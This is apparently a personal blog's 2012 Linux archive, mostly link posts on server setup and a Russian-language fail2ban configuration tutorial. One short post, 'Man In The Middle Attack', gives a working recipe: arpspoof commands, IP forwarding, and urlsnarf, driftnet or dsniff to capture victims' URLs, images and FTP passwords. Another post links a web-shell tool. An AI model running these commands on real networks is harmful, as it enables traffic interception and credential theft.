Sulich's Blog

Sulich's Blog

Archive for the category “Linux”

13 Nov 2012

Fail2ban Centos 5

http://www.md3v.com/install-fail2ban-on-centos-5-5

Posted in Links, Linux | Leave a comment
17 Oct 2012

Webmin installation

http://www.webmin.com/deb.html

 

 

 

Posted in Linux | Leave a comment
21 Aug 2012

NGINX on Ubuntu

http://www.howtoforge.com/perfect-server-ubuntu-12.04-lts-nginx-bind-dovecot-ispconfig-3

 

http://stackoverflow.com/questions/6045020/how-to-redirect-to-a-different-domain-using-nginx

Q.

How can I redirect mydomain.com and any subdomain *.mydomain.com to www.adifferentdomain.com using NGINX?

into /etc/nginx/conf.d/iis.conf

A.

server_name supports suffix matches using .mydomain.com syntax:

server {
  server_name .mydomain.com;
  rewrite ^ http://www.adifferentdomain.com$request_uri? permanent;
}
Posted in Linux | Leave a comment
23 Jun 2012

Man In The Middle Attack

arpspoof -t 192.168.1.101 192.168.1.1

arpspoof -t 192.168.1.1 192.168.1.101

echo 1 > /proc/sys/net/ipv4/ip_forward

urlsnarf -i eth1                                  – for urls

or

driftnet -i eth1                                      – for images

or

dsniff -i eth1                                        – for ftp passwords

Posted in BackTrack 5 | Leave a comment
07 May 2012

Настраиваем fail2ban в Ubuntu

Настраиваем fail2ban в Ubuntu

http://www.tux.in.ua/articles/2782

Не секрет, что стоит только засветиться в Сети новому сервису, как сразу к нему потянутся нити роботов, пытающихся подобрать учетные данные. Остановить процесс можно разными способами, один из них — утилита Fail2ban (fail2ban.org). Идея проста: демон, сканируя логи, проверяет наличие записей о неудачных попытках ввода пароля или попытке входа в запрещенную область сети. Если таковые будут найдены, то подозрительный IP блокируется средствами iptables/ipwf или TCP Wrapper (/etc/hosts.allow|deny). Со временем бан может сниматься автоматически, без вмешательства админа, что очень удобно, ведь под раздачу может попасть и нормальный хост. О блокировке сисадмин получает сообщение по почте. Изначально Fail2ban разрабатывался для защиты SSH, сегодня это уже фреймворк, который можно легко настроить под любые приложения и события, в том числе и прописать свои методы блокировки IP. Удобно также, что один процесс может защищать сразу несколько сервисов, по умолчанию идет с готовыми настройками для SSH, Apache и Vsftpd/ProFTPD. В комплекте имеются готовые описания и для десятка других приложений, но чтобы они проверялись их следует активировать. Проект уже пару лет не развивается, но за это время появились сторонние наработки, в частности, правила для ряда приложений, описывающие, что и где искать. На странице закачки Fail2ban предлагаются собственные сборки пакетов для большинства дистрибутивов Linux. Но для установки лучше выбрать вариант из репозитария. Мэйнтейнеры обычно учитывают особенности конкретного дистра, да и добавляют от себя файлы запуска и правил блокировки. В Ubuntu/Debian установить очень просто. $ sudo apt-get install fail2ban Демон стартует сразу с установками по умолчанию, защищая только SSH. Все настройки производятся в нескольких файлах, размещенных в каталоге /etc/fail2ban (для Debian/Ubuntu). В fail2ban.conf хранятся параметры запуска демона, внутри для настроек ничего интересного для нас нет. Разработчик упростил процесс создания новых правил, начиная с версии 0.7, фильтры и действия прописываются в разных файлах. После установки их можно найти соответственно в подкаталогах filter.d и action.d. Причем файлы внутри могут быть двух расширений — .conf и .local. Параметры из второго замещают установки из первого, то есть, чтобы что-то переопределить, вносить изменения непосредственно в conf не нужно. Такими образом облегчается последующее обновление и возврат к дефолтным настройкам. Правила поиска просты. Предусмотрено использование переменных, причем имеются и уже встроенные. Так, например HOST соответствует регулярному выражению, используемому для поиска IP или имени узла. (?:::f{4,6}:)?(?P[\w\-.^_]+) Например, правило для поиска попыток DDOS в SSH. $ grep -v ‘^#’ /etc/fail2ban/filter.d/sshd-ddos.conf [Definition] failregex = sshd(?:\[\d+\])?: Did not receive identification string from $ ignoreregex = Строка failregex описывает, что искать, в ignoreregex значения которые должны игнорироваться. В одном файле может быть несколько таких строк. Кто хоть немного разбирается в регулярных выражениях, легко создаст свое правило, используя имеющиеся примеры. Для разборки лог файла демон вызывает утилиту fail2ban-regex, которую обычно применяют и для проверки нового фильтра. Например, в поставке нет правила для Asterisk или другого подобного сервера, но сегодня атаки на VoIP становятся более популярными, и в логах часто можно увидеть записи вроде: NOTICE[3309] chan_sip.c: Registration from ‘sip:XXX@1.2.3.4’ failed for ‘9.8.7.6’ – No matching peer found Вид в зависимости от конкретной версии чуть меняется, последняя строка указывающая на конкретную проблему также может принимать порядка 10 описаний — Wrong password, Device does not match ACL и т.д. Правило будет простое: failregex = NOTICE.* .*: Registration from ‘.*’ failed for ” – No matching peer found И так для каждого случая. Проверяем: $ fail2ban-regex /var/log/asterisk.log ‘NOTICE.* .*: Registration from ‘.*’ failed for ” – No matching peer found’ Если все нормально, записываем фильтры в новый файл asterisk.conf, взяв за пример любой из каталога filter.d. С тем, что искать, разобрались, осталось указать, где искать, и что делать с находкой. Описание всех действий собраны в подкаталоге action.d, здесь несколько файлов под каждое приложение/задачу, как правило, там уже все настроено и менять ничего не требуется. Но чтобы новые фильтры увидел Fail2ban, необходимо объявить их в /etc/bail2ban/jail.conf, внутри которого находим несколько секций с описанием разных сервисов. $ sudo nano /etc/bail2ban/jail.conf [DEFAULT] # общие правила могут переопределяться в секциях # IP-адреса, которые не будут блокироваться, может быть подсеть или DNS имя ignoreip = 127.0.0.1 # время блокировки узла, при отрицательном значении блокировка постоянная bantime = 600 # промежуток времени и количество неудачных попыток, необходимых для блокировки maxretry = 3 findtime = 600 [asterisk-iptables] enabled = true # включили # в filter и action, по сути, прописываем имя файла без расширения из соответствующих подкаталогов, плюс дополнительные параметры filter = asterisk action = iptables-allports[name=ASTERISK, protocol=all] sendmail-whois[name=ASTERISK, dest=root, sender=fail2ban@example.org] # логи Asterisk logpath = /var/log/asterisk/messages # переопределяем значение maxretry = 5 bantime = 6000 Проверяем, запущены ли сервисы: $ sudo service iptables start $ sudo service fail2ban start Работу Fail2ban можно отследить, просмотрев журнал /var/log/fail2ban.log или правила iptables. $ sudo iptables -L -v | grep fail2ban

Posted in Linux | Leave a comment
23 Apr 2012

weevely

http://www.youtube.com/watch?v=vcGw1XX-I94&feature=related

Posted in BackTrack 5 | Leave a comment
23 Apr 2012

Nessus on BT5

http://pauldotcom.com/2011/05/activating-nessus-on-backtrack.html

Posted in BackTrack 5, Links | Leave a comment
21 Apr 2012

Snort on CentOS 6.2

http://nachum234.no-ip.org/security/snort/001-snort-installation-on-centos-6-2/

Posted in Links, Linux | Leave a comment
21 Apr 2012

IPTables

http://wiki.centos.org/HowTos/Network/IPTables

Posted in Links, Linux | Leave a comment
20 Apr 2012

LAMP on CentOS 6.2

http://www.howtoforge.com/installing-apache2-with-php5-and-mysql-support-on-centos-6.2-lamp

Posted in Links, Linux | Leave a comment

Post Navigation

Older Entries